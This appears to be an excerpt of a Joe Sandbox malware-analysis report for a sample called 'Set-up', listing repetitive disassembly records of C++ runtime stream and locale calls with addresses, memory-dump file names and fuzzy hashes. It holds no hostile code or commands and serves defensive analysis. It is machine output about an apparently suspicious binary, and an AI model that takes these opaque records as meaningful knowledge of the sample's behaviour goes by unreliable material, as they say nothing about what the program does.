                                                                                              • Instruction ID: f42035376ea4a3ec80358fe1550ee6403a8f42d991a620a9bbd5bbed851ae263
                                                                                              • Opcode Fuzzy Hash: 83ee19bd682137c6fb1fc993bd52ac2f7d07d02c9437e73841d56bb24eb0a81c
                                                                                              • Instruction Fuzzy Hash: 94219875A11108AFCB01CFA8C981BEDFBB9AF18308F244059E546B7281EB399F04DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BD2B
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BD4A
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BD68
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BDCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ?getloc@ios_base@std@@D@std@@@std@@H_prolog3_catchU?$char_traits@U?$char_traits@_Vlocale@2@W@std@@@std@@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3082886559-0
                                                                                              • Opcode ID: 8e4797ae3f2d86c8bdb1267aaeebaba94da9b541b1f13b968e0939c58cb90797
                                                                                              • Instruction ID: 149d2d087ce6caa8979315b03062dbd0309384ea090b03cb7b46aba892db4284
                                                                                              • Opcode Fuzzy Hash: 8e4797ae3f2d86c8bdb1267aaeebaba94da9b541b1f13b968e0939c58cb90797
                                                                                              • Instruction Fuzzy Hash: A621AC71A11208AFCB04CFA8C991EDDFBB9AF18308F24405DE142B7281EB799F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2CC09
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2CC28
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2CC46
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2CCAA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefGetfacetH_prolog3IncrefIpfx@?$basic_istream@_LockitLockit::_Lockit@std@@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 565754905-0
                                                                                              • Opcode ID: 6a19540c453afb357a09eb1f99bc875285f822648656c8133b4c6782b1046b09
                                                                                              • Instruction ID: 86f23aecfc7c49b7a5ce874b6f3ba2b6aca465b98b1c771715450e1f158a8046
                                                                                              • Opcode Fuzzy Hash: 6a19540c453afb357a09eb1f99bc875285f822648656c8133b4c6782b1046b09
                                                                                              • Instruction Fuzzy Hash: 8B217C71A15108AFCB05CFE8C991EEDBBB5AF58308F24405DE142B7291EB799F44DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2EC16
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2EC35
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2EC53
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2ECB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2BC24
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2BC43
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2BC61
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2BCC5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B3C5
                                                                                              • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2B3E4
                                                                                                • Part of subcall function 6BC1DC96: __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                                • Part of subcall function 6BC1DC96: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DC96: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCE1
                                                                                                • Part of subcall function 6BC1DC96: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD0A
                                                                                                • Part of subcall function 6BC1DC96: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DD2B
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2B402
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26191: __EH_prolog3.LIBCMT ref: 6BC26198
                                                                                                • Part of subcall function 6BC26191: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261A2
                                                                                                • Part of subcall function 6BC26191: int.LIBCPMT(00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?,00000004), ref: 6BC261B9
                                                                                                • Part of subcall function 6BC26191: std::locale::_Getfacet.LIBCPMT ref: 6BC261C2
                                                                                                • Part of subcall function 6BC26191: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC394C7,?,00000004,6BC3969A,?,0000003F,?,00000000,00000034,6BC1BB58,?,?,?), ref: 6BC26222
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2B466
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D361
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D380
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D39E
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D402
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2D25A
                                                                                              • ?_Ipfx@?$basic_istream@_WU?$char_traits@_W@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2D279
                                                                                                • Part of subcall function 6BC1DE78: __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                                • Part of subcall function 6BC1DE78: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DE78: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                                • Part of subcall function 6BC1DE78: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                                • Part of subcall function 6BC1DE78: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2D297
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC26234: __EH_prolog3.LIBCMT ref: 6BC2623B
                                                                                                • Part of subcall function 6BC26234: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC26245
                                                                                                • Part of subcall function 6BC26234: int.LIBCPMT(00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC2625C
                                                                                                • Part of subcall function 6BC26234: std::locale::_Getfacet.LIBCPMT ref: 6BC26265
                                                                                                • Part of subcall function 6BC26234: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E902,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC262C5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2D2FB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2E285
                                                                                              • ?_Ipfx@?$basic_istream@GU?$char_traits@G@std@@@std@@QAE_N_N@Z.MSVCP100(00000000,?,00000028), ref: 6BC2E2A4
                                                                                                • Part of subcall function 6BC1E00D: __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                                • Part of subcall function 6BC1E00D: ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1E00D: ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                                • Part of subcall function 6BC1E00D: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                                • Part of subcall function 6BC1E00D: ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000000,?,00000028), ref: 6BC2E2C2
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC262D7: __EH_prolog3.LIBCMT ref: 6BC262DE
                                                                                                • Part of subcall function 6BC262D7: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262E8
                                                                                                • Part of subcall function 6BC262D7: int.LIBCPMT(00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC262FF
                                                                                                • Part of subcall function 6BC262D7: std::locale::_Getfacet.LIBCPMT ref: 6BC26308
                                                                                                • Part of subcall function 6BC262D7: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EEE4,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC26368
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000000,?,00000028), ref: 6BC2E326
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?getloc@ios_base@std@@H_prolog3_catchVlocale@2@std::locale::facet::_$??1_?clear@ios_base@std@@?flush@?$basic_ostream@_?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_DecrefG@std@@@std@@GetfacetH_prolog3IncrefIpfx@?$basic_istream@LockitLockit::_Lockit@std@@U?$char_traits@V12@std::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 587729422-0
                                                                                              • Opcode ID: fa44c75456786a6c8d7c58d83f142a8bff163c89e9f32a58ffa97fbb19a38c09
                                                                                              • Instruction ID: 8259cb8c009ca1c59cb7652ac9804eddc03c5fb28cf71ba2d55dbee40b78d5d9
                                                                                              • Opcode Fuzzy Hash: fa44c75456786a6c8d7c58d83f142a8bff163c89e9f32a58ffa97fbb19a38c09
                                                                                              • Instruction Fuzzy Hash: 4E217971A15108AFCB05CFA8C991EEDFBB9AF58308F24405DE542B7291EB799F04DB60
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC2B18C
